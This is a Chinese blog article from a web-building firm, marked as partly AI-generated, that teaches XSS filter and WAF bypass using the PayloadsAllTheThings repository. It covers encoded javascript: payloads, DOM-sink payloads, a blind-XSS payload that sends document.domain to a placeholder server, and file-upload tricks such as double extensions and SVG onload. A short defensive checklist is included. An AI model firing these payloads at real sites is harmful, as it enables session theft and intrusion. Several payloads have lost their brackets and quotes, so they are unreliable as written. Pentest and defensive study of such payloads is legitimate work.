尧图建网站 尧图建网站 YAOTU WEB BUILD 免费咨询
ARTICLE DETAIL

资讯详情

深耕网站建设与建站编程的一线实战洞察。

XSS 绕过 Payload 实战完整指南:用 PayloadsAllTheThings 突破 WAF 拦截

XSS 绕过 Payload 实战完整指南:用 PayloadsAllTheThings 突破 WAF 拦截 XSS 绕过 Payload 实战完整指南用 PayloadsAllTheThings 突破 WAF 拦截【免费下载链接】PayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF项目地址: https://gitcode.com/GitHub_Trending/pa/PayloadsAllTheThings你的 payload 在本地验证通过到了目标上却被 WAFWeb 应用防火墙拦截可疑请求的中间层吞掉浏览器毫无反应。接下来该试什么先别急着上字典爆破先搞清楚 WAF 到底拦在了哪一层。PayloadsAllTheThings 就是为这类问题准备的实战仓库按注入场景整理了大量真实绕过记录本文带你拆掉反射、DOM、盲打、文件上传四个典型场景。项目能力速览它回答的不是XSS 是什么而是这个过滤拦住了你下一个该试什么。仓库把 payload 按注入上下文归档每类都附绕过原理和真实案例这是它值得收藏的原因按 WAF 厂商整理的拦截绕过记录Cloudflare、Akamai、Fortiweb 等可直接拿走的 polyglot多态payload一段同时适配多种上下文盲 XSS 的端点清单与低成本验证方法 按注入场景拆解的核心手法反射型 XSSjavascript: 协议过滤怎么破思路WAF 大多对javascript:做字面匹配但浏览器会先解码再解析协议头两边看到的不是同一个串。javascript://%0Aalert(1) \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) \u006A\u0061\u0076\u0061\u0073\u0063\x72\x69\x70\x74\x3aalert(1) java%09script:alert(1)这四种分别利用换行注释、十六进制、Unicode、制表符改写协议头。为什么能绕过WAF 匹配的是编码后的原文浏览器解码后仍还原出完整协议下方截图正是两种写法在浏览器中的解析差异。![javascript伪协议编码绕过WAF的XSS解析差异演示](https://raw.gitcode.com/GitHub_Trending/pa/PayloadsAllTheThings/raw/5443cbde384134094f25b1b440695757a2803d55/XSS Injection/Images/DwrkbH1VAAErOI2.jpg?utm_sourcegitcode_repo_files)DOM 型 XSS先找 sink 再选 payload思路服务端没有执行痕迹攻击面在前端代码里。先定位 sink污点落点即用户输入最终写进 DOM 的位置如innerHTML、location.href确认它属于 HTML 上下文还是 JS 上下文。HTML 上下文img src/ onerroralert(2)即可JS 上下文-(confirm)(document.domain)//全程无引号专门对付带转义的单引号过滤为什么能绕过DOM 型的过滤链根本不经过服务端拦截点在前端自身的编码习惯审计 sink 比堆 payload 有效。盲 XSS不显示输出就埋回调思路输入不回显但会流进联系表单、工单系统、Referer/UA 头再被管理后台渲染。先上轻量验证别直接部署重型平台。scriptdocument.locationhttp://your-server/?cdocument.domain/scriptruby -run -ehttpd . -p8080第二条命令起一个单行 HTTP 服务器接回调。收到请求即证明存在盲 XSS。为什么有效这类入口用户不可见、开发者不常审恰好是 WAF 规则和人工复核的双重盲区。文件上传双扩展名与元数据两条线思路先摸清服务端怎么校验文件名——只看后缀、只看最后一个点、还是解码后再验。多数实现只占其一shell.jpg.php shell.php%00.gif svg onloadalert(1)为什么能绕过双扩展名卡在只验末尾后缀的逻辑上空字节卡在解码顺序不一致上SVG 则利用合法图片格式里能写脚本的特性。仓库对 ImageMagick 转换、EXIF 元数据注入都有现成样本。![文件上传攻击面思维导图双扩展名、元数据与XSS绕过路径](https://raw.gitcode.com/GitHub_Trending/pa/PayloadsAllTheThings/raw/5443cbde384134094f25b1b440695757a2803d55/Upload Insecure Files/Images/file-upload-mindmap.png?utm_sourcegitcode_repo_files) 配套工具链DalfoxGo 实现payload 生成与验证速度快适合对一组 URL 批量过一遍XSStrikePython 框架自动变异和编码变换能力强适合对单个入口深挖XSpearRuby 版 Dalfox 同类与前者交叉验证减少误报防御侧对照先解码再匹配WAF 必须把所有层编码归一化后再过规则编码差encoding differential利用双方解码顺序不一致的漏洞就是钻过滤与解码顺序的空子输出端按上下文转义输入过滤会漏按 HTML 属性、JS 字符串等上下文分别做输出编码才可靠Cookie 同时加HttpOnly和SameSite上传校验放服务端不信客户端传来的文件名与 MIME白名单校验后重命名落盘存储目录禁用脚本执行 模块资源索引XSS Injection 模块全部 payload、方法论与 PoC3 - XSS Common WAF Bypass按厂商归档的真实 WAF 拦截绕过记录2 - XSS Polyglot多态 payload 合集4 - CSP BypassCSP内容安全策略限制页面可加载资源来源绕过Upload Insecure Files 模块上传漏洞全攻击面收尾行动清单把仓库XSS Injection目录放到工作目录测试时按输出上下文HTML 属性 / JS 字符串 / 标签查表选 payload而不是从字典头开始爆破被拦后先记录响应特征拦的是哪个编码形态再去 WAF Bypass 文档里找同厂商先例盲打场景先用payload 单行服务器两分钟验证确认存在再考虑上 Hunter 类平台做防御的同学拿同一批 payload 对自己的过滤规则跑一遍回归重点验证先解码再过滤是否生效【免费下载链接】PayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF项目地址: https://gitcode.com/GitHub_Trending/pa/PayloadsAllTheThings创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表